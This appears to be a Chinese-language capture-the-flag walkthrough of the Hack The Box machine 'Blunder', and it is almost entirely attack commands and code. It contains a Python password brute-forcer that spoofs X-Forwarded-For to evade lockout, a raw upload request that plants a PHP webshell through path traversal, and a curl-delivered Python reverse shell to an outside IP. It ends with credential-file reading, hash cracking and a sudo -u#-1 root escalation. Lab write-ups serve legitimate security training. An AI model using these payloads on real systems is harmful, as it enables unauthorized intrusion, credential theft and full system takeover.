我要评论信息收集
| ip address | opening ports |
|---|---|
| 10.10.10.191 | tcp:80 |
$ nmap -p- 10.10.10.191 --min-rate 1000 -sc -sv
80/tcp open http apache httpd 2.4.41 ((ubuntu))
|_http-generator: blunder
|_http-title: blunder | a blunder of interesting facts
|_http-server-header: apache/2.4.41 (ubuntu)
www-data 权限
$ gobuster dir -u "http://10.10.10.191/" -w /usr/share/seclists/discovery/web-content/raft-small-words.txt -x txt,php -b 404,403 -t 50
http://10.10.10.191/todo.txt
username:fergus
$ cewl 10.10.10.191 > pass.txt
#!/usr/bin/env python3
import re
import requests
host = 'http://10.10.10.191'
login_url = host + '/admin/login'
username = 'fergus'
wordlist = []
with open('pass.txt', 'r') as words:
for line in words:
line = line.rstrip()
wordlist.append(line)
for password in wordlist:
session = requests.session()
login_page = session.get(login_url)
csrf_token = re.search('input.+?name="tokencsrf".+?value="(.+?)"', login_page.text).group(1)
print('[*] trying: {p}'.format(p=password))
headers = {
'x-forwarded-for': password,
'user-agent': 'mozilla/5.0 (x11; linux x86_64) applewebkit/537.36 (khtml, like gecko) chrome/77.0.3865.90 safari/537.36',
'referer': login_url
}
data = {
'tokencsrf': csrf_token,
'username': username,
'password': password,
'save': ''
}
login_result = session.post(login_url, headers=headers, data=data, allow_redirects=false)
if 'location' in login_result.headers:
if '/admin/dashboard' in login_result.headers['location']:
print()
print('success: password found!')
print('use {u}:{p} to login.'.format(u=username, p=password))
print()
break
$ python3 exp.py
password:rolanddeschain
https://github.com/bludit/bludit/issues/1081
post /admin/ajax/upload-images http/1.1
host: 10.10.10.191
user-agent: mozilla/5.0 (x11; linux x86_64; rv:91.0) gecko/20100101 firefox/91.0
accept: */*
accept-language: en-us,en;q=0.5
accept-encoding: gzip, deflate, br
x-requested-with: xmlhttprequest
content-type: multipart/form-data; boundary=---------------------------423763520129402281753554177338
content-length: 173373
origin: http://10.10.10.191
connection: close
referer: http://10.10.10.191/admin/new-content
cookie: bludit-key=7vn276oblmdb0l4kt4n3sltkl5
-----------------------------423763520129402281753554177338
content-disposition: form-data; name="images[]"; filename="team.php"
content-type: image/png
<?=phpinfo();system($_get[0]);?>
-----------------------------423763520129402281753554177338
content-disposition: form-data; name="uuid"
../../tmp
-----------------------------423763520129402281753554177338
content-disposition: form-data; name="tokencsrf"
96062fa2efef00e52320951d57034af3a4f480f4
-----------------------------423763520129402281753554177338--
$ curl "http://10.10.10.191/bl-content/tmp/team.php?0=python%20-c%20'import%20socket%2csubprocess%2cos%3bs%3dsocket.socket(socket.af_inet%2csocket.sock_stream)%3bs.connect((%2210.10.16.6%22%2c10032))%3bos.dup2(s.fileno()%2c0)%3b%20os.dup2(s.fileno()%2c1)%3bos.dup2(s.fileno()%2c2)%3bimport%20pty%3b%20pty.spawn(%22%2fbin%2fsh%22)'"
user 权限
$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
username:hugo
hash:faca404fd5c0a31cf1897b823c695c85cffeb98d
https://md5decrypt.net/en/sha1/
!
password:password120
user.txt
$ cat /home/hugo/user.txt
权限提升
$ sudo --version
$ sudo -u#-1 /bin/bash
root.txt
# cat /root/root.txt
发表评论